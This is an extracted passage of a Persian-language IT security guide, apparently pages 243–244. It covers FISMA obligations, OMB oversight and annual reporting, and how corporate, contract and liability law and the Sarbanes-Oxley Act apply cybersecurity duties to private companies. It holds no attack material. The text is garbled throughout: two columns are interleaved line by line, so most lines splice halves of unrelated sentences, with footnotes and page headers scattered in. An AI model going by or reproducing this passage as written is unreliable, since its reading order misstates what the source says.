‫‪ FISMA‬ﺑﺮﺍﻱ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺗﻤﺎﻣﻲ ﺳﻴﺎﺳـﺘﻬﺎ‬ ‫ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺳﻄﺢ ﻛﺎﻓﻲ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫـﺎ‪ ،‬ﺍﻣﻜﺎﻧـﺎﺕ‪ ،‬ﻭ‬
‫ﻭ ﺍﻟﮕﻮﻫﺎﻱ ﺳﺮﺁﻣﺪﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻧﻤﺎﻳﻨﺪﺓ ﺍﺩﺍﺭﺓ ﻣﺪﻳﺮﻳﺖ ﻭ‬ ‫ﺳﻴﺴﺘﻤﻬﺎ ﻳﺎ ﮔﺮﻭﻫﻬﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ؛‬
‫ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨـﺪ ﻛـﻪ ﺗﻬﻴـﻪ ﻭ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻫﻤـﺔ‬ ‫ﺑﺮﮔﺰﺍﺭﻱ ﺩﻭﺭﻩﻫﺎﻱ ﺁﻣﻮﺯﺷﻲ ﺑﺮﺍﻱ ﺍﻓﺰﺍﻳﺶ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘﻲ‬ ‫•‬
‫ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ ﺳﺮﭘﺮﺳـﺘﻲ ﻛﻨـﺪ‪.‬‬ ‫ﻛﺎﺭﻛﻨـــﺎﻥ ﺳـــﺎﺯﻣﺎﻥ‪ ،‬ﭘﻴﻤﺎﻧﻜـــﺎﺭﺍﻥ ﻭ ﺳـــﺎﻳﺮ ﻛـــﺎﺭﺑﺮﺍﻥ‬
‫‪ FIMSA‬ﻫﻤﭽﻨــﻴﻦ ﺑــﺮﺍﻱ ﺗﻬﻴــﻪ ﺍﺳــﺘﺎﻧﺪﺍﺭﺩﻫﺎ‪ ،‬ﺭﺍﻫﺒﺮﺩﻫــﺎ ﻭ‬ ‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﺳﺎﺯﻣﺎﻥ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ؛‬
‫ﭘﻴﺸﻨﻴﺎﺯﻫﺎﻱ ﺣﺪﺍﻗﻠﻲ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ٦٧،‬ﺍﺧﺘﻴـﺎﺭﺍﺕ ﻻﺯﻡ ﺭﺍ ﺑـﻪ‬
‫ﻣﺆﺳﺴﻪ ﻣﻠﻲ ﻋﻠـﻮﻡ ﻭ ﻓﻨـﺎﻭﺭﻱ ﻭﺍﮔـﺬﺍﺭ ﻛـﺮﺩﻩ ﻭ ﻧﻤﺎﻳﻨـﺪﺓ ﺍﺩﺍﺭﺓ‬ ‫ﺁﺯﻣﻮﺩﻥ ﻭ ﺍﺭﺯﻳﺎﺑﻲ ﻣﺘﻨﺎﻭﺏ ﺍﺛﺮﺑﺨﺸﻲ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ‬ ‫•‬

‫ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﺭﺍ ﻣﻠﺰﻡ ﻣﻲﻛﻨﺪ ﻛﻪ ﺑﺮﺁﻭﺭﺩﻩ ﺷـﺪﻥ ﺍﻳـﻦ‬ ‫ﺍﻃﻼﻋــﺎﺕ‪ ،‬ﺭﻭﺍﻟﻬــﺎ ﻭ ﺗﺠﺮﺑﻴــﺎﺕ‪ ،‬ﻛــﻪ ﺷــﺎﻣﻞ ﺁﺯﻣــﻮﺩﻥ‬
‫ﻧﻴﺎﺯﻫﺎ ﺭﺍ ﻣﺪﻳﺮﻳﺖ ﻛﻨﺪ ﻭ ﺣﺪﺍﻗﻞ ﺳﺎﻟﻲ ﻳﻜﺒﺎﺭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻣﻨﻴـﺖ‬ ‫ﻛﻨﺘﺮﻟﻬﺎﻱ ﻣﺪﻳﺮﻳﺘﻲ‪ ،‬ﻋﻤﻠﻜﺮﺩﻱ ﻭ ﻓﻨﻲ ﻣﻲﺑﺎﺷﺪ؛‬
‫ﺍﻃﻼﻋــﺎﺕ ﺳــﺎﺯﻣﺎﻥ ﺭﺍ ﻣــﺮﻭﺭ ﻭ ﺍﺻــﻼﺡ ﻧﻤﺎﻳــﺪ‪ .‬ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ‬ ‫ﻳﻚ ﻓﺮﺁﻳﻨﺪ ﺑﺮﺍﻱ ﻃﺮﺍﺣﻲ‪ ،‬ﺍﺟﺮﺍ‪ ،‬ﺍﺭﺯﻳـﺎﺑﻲ ﻭ ﻣـﺴﺘﻨﺪﺳﺎﺯﻱ‬ ‫•‬
‫ﻣﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟﻪﺭﻳﺰﻱ ﻣﺴﺌﻮﻝ ﺍﺭﺍﺋﻪ ﮔﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺩﺭ ﻣـﻮﺭﺩ‬ ‫ﻋﻤﻠﻴﺎﺕ ﻧـﺎﮔﺰﻳﺮﻱ ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﻧﻘـﺎﺋﺺ ﺩﺭ ﺳﻴﺎﺳـﺘﻬﺎ‪،‬‬
‫‪٦٨‬‬
‫ﺑﺎﺯﺩﻩ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﻛﻨﮕﺮﻩ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﺭﻭﺍﻟﻬﺎ‪ ،‬ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ؛‬
‫ﺭﻭﺍﻟﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺷﻨﺎﺳـﺎﻳﻲ‪ ،‬ﮔـﺰﺍﺭﺵ ﻭ ﭘﺎﺳـﺦ ﺑـﻪ ﻭﻗـﺎﻳﻊ‬ ‫•‬
‫ﺍﻣﻨﻴﺘﻲ؛ ﻭ‬
‫ﻃﺮﺣﻬــﺎ ﻭ ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺍﻃﻤﻴﻨــﺎﻥ ﺍﺯ ﺗــﺪﺍﻭﻡ ﻓﻌﺎﻟﻴــﺖ‬ ‫•‬
‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺳﺎﺯﻣﺎﻥ‪.‬‬
‫ﺩﺭ ﺧــﺼﻮﺹ ﻛﻔﺎﻳــﺖ ﻭ ﺍﺛﺮﺑﺨــﺸﻲ ﺳﻴﺎﺳــﺘﻬﺎ‪ ،‬ﻓﺮﺁﻳﻨــﺪﻫﺎ ﻭ‬
‫ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻭ ﻫﻤﭽﻨﻴﻦ ﻣﻴﺰﺍﻥ ﺗﻄﺎﺑﻖ ﺁﻧﻬﺎ ﺑﺎ‬
‫ﻋﻨﺎﺻﺮ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺭ ﺑﺮﻧﺎﻣﺔ ﺍﻣﻨﻴﺖ ﺍﻃﻼﻋﺎﺕ‪ ،‬ﻫﺮ ﺳـﺎﺯﻣﺎﻥ ﺑﺎﻳـﺪ‬
‫ﺑــﻪ ﻧﻤﺎﻳﻨــﺪﺓ ﺍﺩﺍﺭﺓ ﻣــﺪﻳﺮﻳﺖ ﻭ ﺑﻮﺩﺟــﻪﺭﻳــﺰﻱ ﻭ ﻛﻤﻴﺘــﻪﻫــﺎﻱ‬
‫ﻛﻨﮕﺮﻩﺍﻱ‪ ،‬ﻳﻚ ﮔـﺰﺍﺭﺵ ﺳـﺎﻟﻴﺎﻧﻪ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳـﺪ‪ .‬ﺑﻌـﻼﻭﻩ ﻣﻴـﺰﺍﻥ‬
‫ﻛﻔﺎﻳﺖ ﻭ ﺗﺄﺛﻴﺮﮔﺬﺍﺭﻱ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ‪ ،‬ﺭﻭﻧـﺪﻫﺎ ﻭ‬
‫‪66‬‬ ‫‪Title 44, United States Code, section 3545‬‬
‫‪67‬‬ ‫‪Title 40, United States Code, section 11331‬‬
‫‪68‬‬ ‫‪Title 44, United States Code, section 3543‬‬ ‫‪65‬‬ ‫‪Office of Management and Budget‬‬
‫‪٢٤٣‬‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬

‫ﻣﻮﺭﺩﻱ‪ ،‬ﺗﻼﺵ ﻣﻲﻛﻨﻨﺪ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻗﺎﻧﻮﻧﻤﻨﺪ ﺗﺠﺎﺭﺕ ﺳـﻨﺘﻲ ﺭﺍ‬


‫ﺑﺮ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺍﻋﻤﺎﻝ ﻛﻨﻨـﺪ‪ .‬ﺩﺭ ﻛـﺸﻮﺭﻫﺎﻳﻲ ﻛـﻪ‬
‫ﺳﻴﺴﺘﻢ ﻗﻀﺎﻳﻲ ﺁﻧﻬﺎ ﺑﻪ ﻗﺎﺿﻲ ﺍﺟـﺎﺯﻩ ﻣـﻲﺩﻫـﺪ ﻣﻔـﺎﻫﻴﻢ ﻛﻠـﻲ‬
‫ﻗﺎﻧﻮﻥ ﺭﺍ ﻃﺒﻖ ﺷﺮﺍﻳﻂ ﺟﺪﻳﺪ ﺗﻔﺴﻴﺮ ﻛﻨﺪ‪ ،‬ﻗﻀﺎﺕ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺑـﻪ‬
‫ﺣﻞ ﻣﺴﺎﺋﻞ ﻭ ﻣﺸﻜﻼﺕ ﺣﻘﻮﻗﻲ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﻧﻴﺎﺯﻣﻨﺪ‬ ‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭﺑﺎﺭﺓ ﻣﻔﺎﻫﻴﻢ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ )ﻫﻤﭽﻮﻥ ﺳﻬﻞﺍﻧﮕـﺎﺭﻱ‬
‫ﻳﺎ ﻋﺪﻡ ﺍﻧﺠﺎﻡ ﻭﻇﺎﻳﻒ ﻣﺤﻮﻟﻪ ﺩﺭ ﻗﺮﺍﺭﺩﺍﺩ( ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬
‫ﻧﻘﺶ ﻗﺎﻧﻮﻥ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ‬
‫ﺍﺳﺖ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ‪.‬‬ ‫ﺑﺮ ﺑﺨﺶ ﺧﺼﻮﺻﻲ‬
‫ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﭼﻨـﻴﻦ ﺿـﻮﺍﺑﻄﻲ ﺣﺘـﻲ ﺩﺭ ﻗـﻮﺍﻧﻴﻦ ﻛـﺸﻮﺭﻫﺎﻱ‬
‫ﺗﻮﺳﻌﻪﻳﺎﻓﺘﻪ ﻧﻴﺰ ﺑﻨﺪﺭﺕ ﻳﺎﻓﺖ ﻣـﻲ ﺷـﻮﺩ‪ ،‬ﺑﺨـﺸﻲ ﺍﺯ ﺗﻼﺷـﻬﺎﻱ‬ ‫ﺍﻧﺘﻘﺎﻝ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻗﺎﻧﻮﻧﻲ ﺳﻨﺘﻲ‬
‫ﺳﻴﺎﺳﺘﮕﺬﺍﺭﻱ ﻭ ﻗﺎﻧﻮﻥﻧﻮﻳﺴﻲ ﻫﺮ ﻛﺸﻮﺭ ﺍﻋﻢ ﺍﺯ ﺗﻮﺳـﻌﻪﻳﺎﻓﺘـﻪ ﻭ‬ ‫ﺑﻪ ﺣﻮﺯﺓ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬
‫ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺑﺎﻳﺪ ﺻـﺮﻑ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴـﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺷـﻮﺩ‬
‫ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺧـﻮﺩ‬
‫)ﻣﺴﺎﺋﻠﻲ ﻧﻈﻴﺮ ﺗﻮﺟﻪ ﺑـﻪ ﭼﮕـﻮﻧﮕﻲ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﻣﻔـﺎﻫﻴﻢ ﻗـﺎﻧﻮﻧﻲ ﺳـﻨﺘﻲ ﺩﺭ‬
‫ﺍﻧﮕﻴﺰﺓ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻨﺎﻓﻊ ﺁﻧﻬﺎ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺍﻳـﻦ ﻣﻮﺿـﻮﻉ‬
‫ﻣﻮﺍﺭﺩﻱ ﭼﻮﻥ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ(‪.‬‬
‫ﺍﺳﺖ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﻳﻚ ﺷﺮﻛﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﻣﺸﻜﻼﺕ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ‬
‫ﺩﺭ ﺍﻳﻦ ﺑﺨﺶ ﺭﻭﺷﻬﺎﻳﻲ ﺭﺍ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣـﻲ ﺩﻫـﻴﻢ ﻛـﻪ ﺩﺭ‬ ‫ﺍﺯ ﺧﻮﺩ ﻣﺤﻔﺎﻇﺖ ﻧﻜﻨﺪ‪ ،‬ﺯﻳﺎﻧﻬﺎﻱ ﺣﺎﺻـﻠﻪ ﻣـﺴﺘﻘﻴﻤﹰﺎ ﻣﻨـﺎﻓﻊ ﺁﻧـﺮﺍ‬
‫ﺁﻧﻬﺎ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﺁﻧﭽﻨﺎﻥ ﺗﻮﺳﻌﻪ ﭘﻴﺪﺍ ﻣﻲﻛﻨﻨﺪ ﻛﻪ‬ ‫ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻓﻀﺎﻱ ﺳﺎﻳﺒﺮ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﻣﻨﺠﺮ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﺩﺭ ﺣﻮﺯﺓ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﻴﺰ ﺑﻜﺎﺭ ﺭﻭﻧﺪ‪ .‬ﺩﺭ ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬ ‫ﺑﻪ ﺗﻮﻗﻒ ﻓﻌﺎﻟﻴﺖ ﺗﺠﺎﺭﻱ ﻳﻚ ﺷﺮﻛﺖ ﻭ ﺧﺪﺷﻪﺩﺍﺭ ﺷﺪﻥ ﺍﻋﺘﺒـﺎﺭ‬
‫ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺻﺮﻓﹰﺎ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺩﺭ‬ ‫ﺁﻥ ﮔﺮﺩﻧﺪ‪ .‬ﺣﻤﻠﻪ ﺑـﻪ ﺷـﺒﻜﺔ ﺭﺍﻳﺎﻧـﻪ ﺍﻱ ﺷـﺮﻛﺖ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬
‫ﺑﺨﺶ ﺧﺼﻮﺻﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻧﻴﺰ ﻣﻮﺭﺩ ﺑﺤﺚ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ‪.‬‬ ‫ﻋﻤﻠﻴﺎﺕ ﺁﻧﺮﺍ ﻣﺘﻮﻗﻒ ﻧﻤﺎﻳﺪ ﻭ ﺑﺎﻋﺚ ﺁﺳﻴﺐ ﺩﻳﺪﻥ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ‬
‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ‬

‫ﺩﺍﺩﻩﻫﺎﻱ ﻣﺸﺘﺮﻳﺎﻥ ﻳﺎ ﺍﺳﺮﺍﺭ ﺗﺠﺎﺭﻱ ﺷﻮﺩ‪ .‬ﻫﺮ ﺷـﺮﻛﺘﻲ ﻛـﻪ ﺑـﻪ‬


‫ﻗﻮﺍﻧﻴﻦ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﺩﺍﺭﺓ ﺳﺎﺯﻣﺎﻥ‪،‬‬ ‫ﺍﻣﻨﻴﺖ ﺗﻮﺟﻪ ﻻﺯﻡ ﺭﺍ ﺍﺧﺘﺼﺎﺹ ﻧﺪﺍﺩﻩ ﺑﺎﺷﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺗﻤـﺎﻣﻲ‬
‫ﺣﺴﺎﺑﺪﺍﺭﻱ‪ ،‬ﻭ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻭﺭﺍﻕ ﺑﻬﺎﺩﺍﺭ‬ ‫ﻣﺸﺘﺮﻳﺎﻥ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺭﻗﺒﺎﻳﻲ ﻭﺍﮔﺬﺍﺭ ﻧﻤﺎﻳﺪ ﻛﻪ ﺑـﻪ ﺍﻣﻨﻴـﺖ ﺗﻮﺟـﻪ‬
‫ﻃﺒﻖ ﻗﻮﺍﻧﻴﻦ ﺳﺎﺯﻣﺎﻥ‪ ،‬ﻣـﺪﻳﺮﺍﻥ ﻭ ﻣـﺴﺌﻮﻻﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺩﺭ‬ ‫ﻛﺎﻓﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭﺻـﻮﺭﺗﻴﻜﻪ ﺳـﺎﺯﻧﺪﮔﺎﻥ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﻭ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ‬
‫ﻗﺒﺎﻝ ﺳﺎﺯﻣﺎﻥ ﻭ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺁﻥ ﺗﻌﻬﺪ ﻛﻨﻨﺪ ﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﺩﻗﻴﻘﻲ‬ ‫ﻣﺤﺼﻮﻻﺕ ﻧﺎﺍﻣﻦ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣـﺸﺘﺮﻳﺎﻥ ﺧـﻮﺩ ﺭﺍ‬
‫ﺍﺯ ﻋﻤﻠﻴﺎﺕ ﺗﺠﺎﺭﻱ ﺳـﺎﺯﻣﺎﻥ ﺍﺭﺍﺋـﻪ ﻧﻤﺎﻳﻨـﺪ‪ .‬ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ ﺑﻄـﻮﺭ‬ ‫ﺑﺴﺮﻋﺖ ﺍﺯ ﺩﺳﺖ ﺑﺪﻫﻨﺪ‪.‬‬
‫ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﺩﺭﺣﺎﻝ ﺟﺎ ﺍﻓﺘﺎﺩﻥ ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﭘـﻴﺶﺑﻴﻨـﻲ‪ ،‬ﺷـﺎﻣﻞ‬ ‫ﻋﻼﻭﻩ ﺑﺮ ﻓﺸﺎﺭﻫﺎﻳﻲ ﻛﻪ ﺍﺯ ﻃـﺮﻑ ﺑـﺎﺯﺍﺭ ﺑـﺮﺍﻱ ﺑـﺮﺁﻭﺭﺩﻩ ﻛـﺮﺩﻥ‬
‫ﻣﻮﺿــﻮﻋﺎﺗﻲ ﭼــﻮﻥ ﺍﻣﻨﻴــﺖ ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺰ ﻣــﻲﺷــﻮﺩ‪ .‬ﺑﺮﺧــﻲ‬ ‫ﺍﻣﻨﻴﺖ ﺑﻪ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﮔﺎﻥ ﻣﻲﺁﻳﺪ‪ ،‬ﻗﻮﺍﻧﻴﻦ ﻧﻴﺰ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺍﻳـﻦ‬
‫ﺻﺎﺣﺒﻨﻈﺮﺍﻥ ﻣﺘﺬﻛﺮ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺍﮔﺮ ﻣﺪﻳﺮﺍﻥ ﺍﺯ ﺑﺮﺩﺍﺷﺘﻦ ﮔﺎﻣﻬﺎﻱ‬ ‫ﺯﻣﻴﻨﻪ ﻳﻚ ﻋﺎﻣﻞ ﺍﻧﮕﻴﺰﺷﻲ ﺑﺎﺷﻨﺪ‪ .‬ﺷـﺮﻛﺘﻬﺎ ﺑـﺎ ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺯ‬
‫ﻣﻨﺎﺳــﺐ ﺑــﺮﺍﻱ ﺍﺭﺯﻳــﺎﺑﻲ ﺗﻬﺪﻳــﺪﺍﺕ ﺍﻣﻨﻴﺘــﻲ ﺧــﻮﺩﺩﺍﺭﻱ ﻛﻨﻨــﺪ‪،‬‬ ‫ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺑﺮﺁﻣﺪﻩ ﺍﺯ ﻣﻔﺎﻫﻴﻢ ﺳـﻨﺘﻲ ﭼـﻮﻥ ﻗـﻮﺍﻧﻴﻦ ﺷـﺮﻛﺘﻬﺎ‪،‬‬
‫ﺩﺭﺻﻮﺭﺕ ﻣﺘﻀﺮﺭ ﺷﺪﻥ‪ ،‬ﺩﺭ ﻗﺒﺎﻝ ﺳﻬﺎﻣﺪﺍﺭﺍﻥ ﺷـﺮﻛﺖ‪ ،‬ﻣـﺴﺌﻮﻝ‬ ‫ﻗﻮﺍﻧﻴﻦ ﻗﺮﺍﺭﺩﺍﺩﻫﺎ ﻭ ﻗﻮﺍﻧﻴﻦ ﭘﺎﺳﺨﮕﻮ ﺑﻮﺩﻥ )ﺑـﺮﺍﻱ ﺟﺒـﺮﺍﻥ ﺧـﺴﺎﺭﺍﺕ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ‪.‬‬ ‫ﻋﻤﺪﻱ ﻭ ﻏﻴﺮﻋﻤﺪﻱ( ﻣﻮﺍﺟﻪ ﺷﺪﻩﺍﻧﺪ‪ .‬ﺁﻧﻬﺎ ﻫﻤﭽﻨﻴﻦ ﻗﻮﺍﻧﻴﻦ ﺟﺪﻳﺪﺗﺮ‬
‫ﺩﺭ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﻳﻦ ﻧﻮﻉ ﻭﻇﺎﻳﻒ ﻛﻪ ﺑﺮﺧﺎﺳﺘﻪ ﺍﺯ ﻗـﻮﺍﻧﻴﻦ ﻋـﺎﻡ‬ ‫ﻧﻈﻴﺮ ﺛﺒﺖ ﻭ ﻓﺮﻭﺵ ﺍﻣﻦ ﺍﻭﺭﺍﻕ ﺑﻬـﺎﺩﺍﺭ ﺩﺭ ﻣﺒـﺎﺩﻻﺕ ﻋﻤـﻮﻣﻲ ﻭ‬
‫ﺷﺮﻛﺘﻬﺎ ﻫﺴﺘﻨﺪ ﺑﺎ ﺗﺼﻮﻳﺐ ﻗـﻮﺍﻧﻴﻦ ﻛﻴﻔـﺮﻱ ﺗﻘﻮﻳـﺖ ﺷـﺪﻩﺍﻧـﺪ‪.‬‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻣﻌﺎﻣﻼﺕ ﻓﺮﻳﺒﻨـﺪﻩ ﻭ ﻧﺎﻋﺎﺩﻻﻧـﻪ ﺗﺠـﺎﺭﻱ ﺭﺍ ﭘـﻴﺶ‬
‫ﻗـــﺎﻧﻮﻥ ‪) Sarbanes-Oxley‬ﻣـــﺼﻮﺏ ﺳـــﺎﻝ ‪ ،(۲۰۰۲‬ﭼﻨـــﺪ‬ ‫ﺭﻭﻱ ﺧﻮﺩ ﻣﻲﺑﻴﻨﻨﺪ‪ .‬ﻧﺤـﻮﺓ ﺗﻄﺒﻴـﻖ ﺍﻳـﻦ ﻣـﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﺳـﻨﺘﻲ‬
‫ﻧﻴﺎﺯﻣﻨــﺪﻱ ﺟﺪﻳــﺪ ﺑــﻪ ﺷــﺮﻛﺘﻬﺎ ﺗﺤﻤﻴــﻞ ﻛــﺮﺩ ﻭ ﺑــﺎ ﺍﻋــﻼﻡ‬ ‫ﻗﺎﻧﻮﻧﻲ ﺑﻪ ﺣﻮﺯﺓ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺖ ﺳﺎﻳﺒﺮ ﺗﻮﺟﻪ ﻭ ﺗـﻼﺵ ﺯﻳـﺎﺩﻱ ﺭﺍ‬
‫ﺭﺳــﻮﺍﻳﻲﻫــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﺩﺭ ﻣﻘﻴــﺎﺱ ﻭﺳــﻴﻊ ﺗﻮﺟــﻪ ﻫﻤﮕــﺎﻥ ﺭﺍ‬ ‫ﻣﻌﻄﻮﻑ ﺧﻮﺩ ﻛﺮﺩﻩ ﺍﺳﺖ‪ .‬ﺩﺭﺣﺎﻝ ﺣﺎﺿﺮ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻗﺎﻧﻮﻧﮕﺬﺍﺭ ﺑﺎ‬
‫ﻭﺿﻊ ﻗﻮﺍﻧﻴﻦ ﻋﻤﻮﻣﻲ ﻳﺎ ﺻﺪﻭﺭ ﺑﺨﺸﻨﺎﻣﻪﻫـﺎ ﻭ ﺁﻳـﻴﻦﻧﺎﻣـﻪﻫـﺎﻱ‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٢٤٤‬‬

‫ﻧﻘﺾ ﺗﻌﻬﺪﺍﺕ ﺭﻭﺑﺮﻭ ﺷﻮﺩ‪ .‬ﺯﻣﺎﻧﻴﻜﻪ ﺭﺍﻳﺎﻧـﻪ ﻫـﺎﻱ ﻳـﻚ ﺷـﺮﻛﺖ‬ ‫ﺑﺮﺍﻧﮕﻴﺨﺖ‪ .‬ﻛﻨﮕﺮﻩ ﺗﺼﻮﻳﺐ ﻛﺮﺩ ﻛﻪ ﺍﻣﻨﻴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺑـﺮﺍﻱ‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺣﻤﻼﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑـﻪ ﻳـﻚ ﻣﻘـﺼﺪ ﺛﺎﻟـﺚ ﺑﻜـﺎﺭ‬ ‫ﺍﺭﺯﻳﺎﺑﻲ ﺩﺍﺩﻩﻫﺎﻱ ﻣﺎﻟﻲ ﺷﺮﻛﺘﻬﺎ ﺿﺮﻭﺭﻱ ﺍﺳﺖ‪ .‬ﻛﻨﮕﺮﻩ ﻫﻤﭽﻨﻴﻦ‬
